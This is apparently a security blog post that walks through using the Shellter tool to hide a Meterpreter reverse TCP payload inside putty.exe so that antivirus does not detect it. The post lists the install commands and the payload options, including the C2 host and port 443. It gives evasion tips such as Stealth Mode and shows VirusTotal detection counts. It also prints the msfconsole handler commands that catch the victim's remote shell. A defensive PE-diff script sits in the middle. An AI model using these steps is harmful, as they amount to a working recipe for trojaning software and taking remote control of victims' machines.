CYBER & INFOSEC


Shellter Project – bypassing AV Detection

Shellter is a dynamic shellcode injection tool and can be found at www.shellterproject.com. I have been using the tool to demonstrate to customers how simple it is to bypass antivirus (AV) detection with payloads that a typical AV analysis engine would otherwise flag as suspicious or malicious.

The Good

Shellter is a dynamic PE (Portable Executable) infector. Rather than wrapping a payload in a fixed template, it traces the execution flow of a legitimate 32-bit Windows program and injects the payload at a point chosen from that trace. The positive aspects of it, according to Shellter's project page, are as follows:


  • Compatible with Windows x86/x64 (XP SP3 and above) plus Wine/CrossOver for Linux/Mac.


  • Portable – no setup is required.

  • Doesn’t require extra dependencies or other programming languages such as Python, .net, etc.

  • No static program executable templates, framework wrappers, etc.

  • Supports any 32-bit payload which can be generated either by Metasploit or user customized payloads.

  • Compatible with all types of encoding by Metasploit.

  • Compatible with custom encoding created by the user.

  • Stealth Mode.

  • Multi-payload PE infection.

  • Proprietary encoding plus user defined encoding sequence.

  • Dynamic thread context keys.

  • Supports reflective dynamic-link library (DLL) loaders.

  • Junk code polymorphic engine.

  • Thread context aware polymorphic engine.

  • User can use custom polymorphic code of his own.

  • Takes advantage of Dynamic Thread Context information for anti-static analysis.

  • Detects self-modifying code.

  • Traces single and multi-thread applications.

  • Fully dynamic injection locations based on the execution flow.

  • Disassembles and shows to the user available injection points.

  • User chooses what to inject, when, and where.

  • Command Line support.

  • And most important…it is free


The Bad

Of course, there are some negatives. The list doesn’t seem nearly as long, but mind you, this is from their Web site. Their ball, their rules…


  • Doesn’t (currently) support 64-bit PE files and payloads.

  • Free, but not open source, ergo…

  • One developer.


The Install:


To install Shellter on Kali Linux use the following commands:


apt-get update

apt-get install shellter

You may also need to install wine32 (Figure 21), since Shellter is a Windows binary that Kali runs under Wine. You can do so by typing the following command (as root) on Kali:


dpkg --add-architecture i386 && apt-get update && apt-get install wine32


Next, we are going to take a legitimate program, like putty.exe, and use it for our test bed. In reality we could use any legitimate 32-bit Windows executable; remember from the list above that Shellter does not handle 64-bit PE files.


You can easily use some slightly more advanced techniques to embed similar types of attacks in other types of files.


For now let’s simply stick with Windows program executables for this example.


As you can see in the screen shot, the legitimate executable has been copied into our working directory on Kali. When you work with Shellter, make sure the carrier (the legitimate executable) is in the directory you run Shellter from. Now we will run Shellter.

For the sake of simplicity and expediency, we will keep to the basics for now. Follow these steps:

  • Select Auto for the operation mode (Figure 24).

  • Specify the legitimate program (the PE target). Shellter creates a backup of the original executable in the same directory and then modifies the original in place.

  • Choose a payload. Shellter offers a list of built-in payloads and also accepts a custom one. We choose Meterpreter reverse TCP from the list, which matches the handler we set up below.

  • Answer the payload options:

    LHOST: the IP address or DNS name the victim machine will connect back to, i.e. the command and control (C2) server. It must be reachable from the victim.

    LPORT: the port the C2 server listens on. In our example we used port 443, since outbound HTTPS is rarely blocked.

NOTE: If you need the legitimate executable intact afterwards, copy it to separate storage before you start; Shellter's own backup sits next to the modified file. Note also that Stealth Mode (in the feature list above) is the option that preserves the carrier's original functionality; without it, the victim gets a program that does not behave like PuTTY, which is an obvious tell.

Congratulations: at this point you have created a new malicious program (Figure 27) that, at the time of writing, most antivirus products did not detect. The VirusTotal results below show how many did.

If you get a verified message (see below) you are basically good to go.

If you check your directory, you will see that putty.exe has been modified and that Shellter created a backup of the original executable. We will now compute the md5sum of the modified file and look the hash up on VirusTotal, or upload the file directly. Keep in mind that a hash lookup only returns a verdict if VirusTotal has already seen that exact file, so a freshly built sample usually has to be uploaded; and an upload shares the sample with the participating vendors, so on a real engagement expect detection of that file to climb after you submit it.


We see that only seven security vendors detect the new program created by Shellter (remember: red is good, it marks the vendors that caught the attack). Those seven are doing a great job; the rest let a Meterpreter payload through inside a known-good application.
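To make that comparison concrete, here is an added Python example (it is not part of the original post and not Shellter's code) that does the file-level checks a defender would run on the two files Shellter leaves behind: it hashes the backup and the modified carrier, parses just enough of the PE32 header to list the entry point and section table, and counts the differing bytes per section. The two PE images are constructed inline as stand-ins for putty.exe and its backup, and the "injection" is simply an overwrite of 16 bytes inside .text; that stand-in is an assumption of this example, not Shellter's algorithm. On a real run, read the backup and the modified putty.exe from disk instead.

```python
"""Compare a Shellter-style backdoored carrier against its backup.

Added example for this post; it is not Shellter's code. Only the standard
library is used: enough PE32 parsing to get the entry point and section
table, plus a per-section count of changed bytes and file hashes.
"""
import hashlib
import struct

# IMAGE_SECTION_HEADER: Name[8], VirtualSize, VirtualAddress, SizeOfRawData,
# PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics (40 bytes)
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")


def parse_pe(data: bytes) -> dict:
    """Return the entry point RVA and the section table of a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images handled, the same limit Shellter has")
    entry = struct.unpack_from("<I", data, opt + 16)[0]   # AddressOfEntryPoint
    sections, off = [], opt + opt_size
    for _ in range(nsections):
        name, vsize, va, rawsize, rawptr, *_ = SECTION_HDR.unpack_from(data, off)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va,
                         "vsize": vsize, "raw": rawptr, "rawsize": rawsize})
        off += SECTION_HDR.size
    return {"entry": entry, "sections": sections}


def section_of(offset: int, sections: list) -> str:
    """Name of the section whose raw data covers a file offset."""
    for s in sections:
        if s["raw"] <= offset < s["raw"] + s["rawsize"]:
            return s["name"]
    return "<headers/overlay>"


def diff_pe(orig: bytes, mod: bytes) -> dict:
    """Report what changed between the backup and the modified carrier."""
    a, b = parse_pe(orig), parse_pe(mod)
    changed = {}
    for i in range(min(len(orig), len(mod))):
        if orig[i] != mod[i]:
            sec = section_of(i, a["sections"])
            changed[sec] = changed.get(sec, 0) + 1
    return {
        "md5": (hashlib.md5(orig).hexdigest(), hashlib.md5(mod).hexdigest()),
        "sha256": (hashlib.sha256(orig).hexdigest(), hashlib.sha256(mod).hexdigest()),
        "same_size": len(orig) == len(mod),
        "entry_moved": a["entry"] != b["entry"],
        "section_table_changed": [s["name"] for s in a["sections"]]
                                 != [s["name"] for s in b["sections"]],
        "changed_bytes_by_section": changed,
    }


def build_pe(text: bytes, data: bytes) -> bytes:
    """Constructed minimal two-section PE32 (headers need only parse, not load)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x102)  # i386, 2 sections
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                        # entry point = .text
    secs = SECTION_HDR.pack(b".text", len(text), 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    secs += SECTION_HDR.pack(b".data", len(data), 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0xC0000040)
    header = (dos + b"PE\0\0" + coff + bytes(opt) + secs).ljust(0x200, b"\0")
    return header + text.ljust(0x200, b"\0") + data.ljust(0x200, b"\0")


# Constructed stand-ins for putty.exe's backup and the file Shellter wrote.
ORIGINAL = build_pe(b"\x55\x8b\xec" + b"\x90" * 60 + b"\xc3", b"PuTTY stand-in\0")
_patched = bytearray(ORIGINAL)
_patched[0x208:0x218] = b"\xe8" + b"\x41" * 15   # 16 bytes overwritten inside .text
MODIFIED = bytes(_patched)

if __name__ == "__main__":
    # Real use: set ORIGINAL/MODIFIED to open(path, "rb").read() of the two files.
    for key, value in diff_pe(ORIGINAL, MODIFIED).items():
        print(f"{key}: {value}")
```

With a real Shellter output you would expect the differing bytes to land inside an existing code section, at points on the execution flow the tool traced, rather than in a new appended section. That is why a scanner keying on a new or oddly named section does not trip, and why the byte diff against the backup is a more useful artifact to hand a detection team than the hash alone.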


We start our listening server in msfconsole on Kali Linux using the following commands (LHOST and LPORT must match what you gave Shellter):


msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.81.175

set LPORT 443

show options

exploit


Now we will go to our victim machine, to which we have transferred the modified executable. Provided the AV on that machine behaves like the engines we saw on VirusTotal, the file sits there unflagged. When we launch it, the embedded payload connects back to our handler and we get a Meterpreter session on the command and control server.


In Conclusion

In future blogs we will explore more along the lines of this topic, and go into some additional details of specific types of evasion attacks and processes. We'll use those to explore wider ranges of AV evasion techniques. This knowledge can be used for good or bad, just as any security knowledge can. I hope you use this to explore the ways cybercriminals try to continue exploiting systems for financial gain through theft and fraud. Our job, as always, is to understand their methods and thwart criminal behavior. Stay tuned, and fight the good fight!
